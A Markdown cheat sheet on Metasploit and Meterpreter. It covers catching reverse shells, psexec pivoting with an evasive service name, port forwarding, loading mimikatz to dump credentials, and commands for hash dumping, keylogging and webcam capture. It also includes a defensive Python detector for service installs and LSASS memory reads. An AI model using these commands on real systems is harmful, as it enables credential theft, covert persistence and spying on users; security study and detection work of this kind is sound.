# Metasploit

### Common Uses

Using the `exploit/multi/handler` to catch reverse shells and manage several sessions. Make sure that you have the correct payload to catch.

Use the `exploit/windows/smb/psexec` module with known credentials to create easy meterpreter sessions to pivot and exploit further. Set the `SERVICE_FILENAME` option to replace the random garbage name it uses by default, because it's suspicious (using something like `svchost` helps hide!).

### Meterpreter

Meterpreter is the payload with the fancy shell: a series of DLLs injected into a process's memory that doesn't touch the disk, with no separate process created. All comms over meterpreter are TLS encrypted unless specifically told not to.

```bash
# Below adds a port forward: localhost:1234 -> meterpreter -> 10.0.0.1:22
meterpreter > portfwd add -l 1234 -p 22 -r 10.0.0.1

# Below adds a route to move all traffic for a subnet through meterpreter session #1
msf > route add [subnet] [netmask] [session id]
msf > route add 10.0.1.0 255.255.255.0 1    # routes through session 1 for 10.0.1.0/24
msf > route add 10.0.0.5 255.255.255.255 1  # routes through session 1 for host 10.0.0.5
```

#### Managing Meterpreter Sessions

Sessions are managed with the `sessions -l` command. Channels inside a session are managed with the `channels -l` command. Upgrade an existing plain shell to meterpreter with `sessions -u 1`.

`CTRL-Z` backgrounds a channel or session.

Load additional modules using `use [module name]`.

#### Mimikatz in Meterpreter

We can load mimikatz directly into a running meterpreter session, giving us serious power. We need to be running as `SYSTEM`, and the process we're in must have the same architecture as the host.

Check that the arch types match with `sysinfo`: the `Architecture` and `Meterpreter` fields must agree. If we need to move, find running processes that have the correct arch and are also running as `SYSTEM` with `ps -A x64 -s`, then move with `migrate [PID]`. Validate that the arch and meterpreter types match with `sysinfo` again.

Now we can import the mimikatz module with `load kiwi`. Running `help` will show our new mimikatz commands we can use. Using `creds_all` will dump all available hashes and plaintext passwords!
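Both of the techniques above leave telemetry a defender can key on: the psexec module installs a Windows service (System log Event ID 7045) whose name is either the random default or a `SERVICE_FILENAME` lookalike installed from a non-system path, and kiwi's `creds_all` reads LSASS memory from the meterpreter host process (Sysmon Event ID 10, ProcessAccess, with the `PROCESS_VM_READ` right). The script below is an added example, not code from these notes or from Metasploit: the event records are constructed, and the name heuristics, lookalike list and LSASS-reader allowlist are assumptions to be tuned per environment.

```python
import json
import re
from typing import Iterator

# Constructed sample telemetry (hypothetical, not captured from a real host):
# Windows System log 7045 "service installed" records and Sysmon Event ID 10
# (ProcessAccess) records, one JSON object per line.
SAMPLE_LOG = [
    json.dumps({"EventID": 7045, "ServiceName": "Spooler",
                "ImagePath": r"C:\Windows\System32\spoolsv.exe"}),
    json.dumps({"EventID": 7045, "ServiceName": "XkQpLzRw",
                "ImagePath": r"%SYSTEMROOT%\XkQpLzRw.exe"}),
    json.dumps({"EventID": 7045, "ServiceName": "svchost",
                "ImagePath": r"C:\Users\Public\svchost.exe"}),
    json.dumps({"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
                "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"}),
    json.dumps({"EventID": 10, "SourceImage": r"C:\Windows\System32\spoolsv.exe",
                "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"}),
]

# Core Windows binary names that a chosen SERVICE_FILENAME may imitate (assumed list).
SYSTEM_LOOKALIKES = {"svchost", "lsass", "csrss", "winlogon", "services", "wininit"}
# Processes assumed to legitimately open LSASS with read access; tune per environment.
LSASS_READERS_ALLOWED = {"csrss.exe", "wininit.exe", "msmpeng.exe"}
PROCESS_VM_READ = 0x0010  # access right required to read another process's memory
SYSTEM32_PREFIXES = ("c:\\windows\\system32\\", "%systemroot%\\system32\\")


def looks_random(name: str) -> bool:
    """Heuristic for auto-generated service names: 8+ letters only, and either
    vowel-free or with frequent upper/lower case changes."""
    if not re.fullmatch(r"[A-Za-z]{8,}", name):
        return False
    vowel_free = re.search(r"[aeiouAEIOU]", name) is None
    flips = sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())
    return vowel_free or flips >= 3


def check_service_install(ev: dict) -> Iterator[dict]:
    """Rules for Event ID 7045: random-looking name, or lookalike name from a non-System32 path."""
    name, path = ev.get("ServiceName", ""), ev.get("ImagePath", "")
    if looks_random(name):
        yield {"rule": "random_service_name", "service": name, "path": path}
    if name.lower() in SYSTEM_LOOKALIKES and not path.lower().startswith(SYSTEM32_PREFIXES):
        yield {"rule": "lookalike_service_name", "service": name, "path": path}


def check_lsass_access(ev: dict) -> Iterator[dict]:
    """Rule for Sysmon Event ID 10: a non-allowlisted process opens lsass.exe with VM_READ."""
    target = ev.get("TargetImage", "").lower()
    source = ev.get("SourceImage", "")
    granted = int(ev.get("GrantedAccess", "0x0"), 16)
    source_exe = source.rsplit("\\", 1)[-1].lower()
    if (target.endswith("\\lsass.exe") and granted & PROCESS_VM_READ
            and source_exe not in LSASS_READERS_ALLOWED):
        yield {"rule": "lsass_memory_read", "source": source, "access": hex(granted)}


def scan(lines) -> list:
    """Run both rule sets over JSON-per-line events and return the alerts in order."""
    alerts = []
    for line in lines:
        ev = json.loads(line)
        if ev.get("EventID") == 7045:
            alerts.extend(check_service_install(ev))
        elif ev.get("EventID") == 10:
            alerts.extend(check_lsass_access(ev))
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Run against the constructed log, the legitimate `Spooler` install and the `csrss.exe` query-only access produce nothing, while the random name, the `svchost` lookalike outside System32, and the `spoolsv.exe` read of LSASS each raise one alert. The `GrantedAccess` check keys on the single `PROCESS_VM_READ` bit rather than a specific mask so it is not tied to one tool's exact access request.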

#### Meterpreter Commands

| Command                                                                                              | Function                                                |
| ---------------------------------------------------------------------------------------------------- | ------------------------------------------------------- |
| `help`                                                                                               | shows all available commands                            |
| `sysinfo`                                                                                            | Shows computer name, OS, and kernel information         |
| `shell`                                                                                              | Launch a command shell on the host                      |
| `getpid`                                                                                             | show process ID of current meterpreter process          |
| `getuid`                                                                                             | shows current user ID meterpreter is running under      |
| `ps`                                                                                                 | get list of processes                                   |
| `migrate`                                                                                            | attempts to move to a different process ID              |
| `cd` / `lcd`                                                                                         | change dir, local change dir                            |
| `ls` / `lls`                                                                                         | list contents, local list contents                      |
| `download`                                                                                           | download a file from the machine                        |
| `upload`                                                                                             | upload a file to the machine                            |
| `edit`                                                                                               | edit a file using vi or nano                            |
| `ipconfig`                                                                                           | show host networking information                        |
| `route`                                                                                              | displays, adds, or deletes host routing table           |
| `portfwd`                                                                                            | forwards traffic to a different location as a TCP relay |
| `creds_all`                                                                                          | Dumps credentials via the kiwi (Mimikatz) extension, after `load kiwi` |
| `hashdump`                                                                                           | gather hashes from host memory, requires SYSTEM privs   |
| `run hashdump`                                                                                       | Pulls from the registry (SAM and Syskey)                |
| `run post/windows/gather/smart_hashdump`                                                             | Gathers from the disk NTDS.dit and SAM                  |
| `run post/windows/gather/hashdump`                                                                   | Pulls from registry (SAM and Syskey)                    |
| `screenshot -p /tmp/screen.jpg`                                                                      | grabs a screenshot of the desktop                       |
| `uictl`                                                                                              | Turn user devices on or off                             |
| `webcam_list` / `webcam_snap`                                                                        | Take control of a webcam available to the host          |
| `keyscan_start` / `keyscan_dump` / `keyscan_stop`                                                    | Keystroke logger to gather information as it's typed    |

### Arsenal

Modular combination of scanners, exploits, payloads, and post modules.

| User Interface | Purpose                                                                          |
| -------------- | -------------------------------------------------------------------------------- |
| `msfconsole`   | Basic MSF prompt for exploitation                                                |
| `msfd`         | Daemon listening on TCP 55554 allowing msfconsole access to anyone that connects |
| `msfrpcd`      | XMLRPC controlled MSF, default TCP 55553 using SSL                               |
| `msfcli`       | MSF with all options specified in a single command, useful for scripting         |
| `msfvenom`     | Used to generate malicious payloads and binaries                                 |

### Modules

| Module Name | Purpose                                                    |
| ----------- | ---------------------------------------------------------- |
| `auxiliary` | Port scanners, DoS tools, login checks, etc                |
| `encoders`  | Convert exploits and payloads to attempt to bypass filters |
| `exploits`  | Exploits used to attack a system                           |
| `nops`      | Create NOP sleds                                           |
| `payloads`  | Huge list of payloads based on system and type             |
| `post`      | Post-exploitation modules to further exploit a system      |

### Troubleshooting

Having issues importing a module? Make sure you check the logs at `~/.msf4/logs/framework.log`.
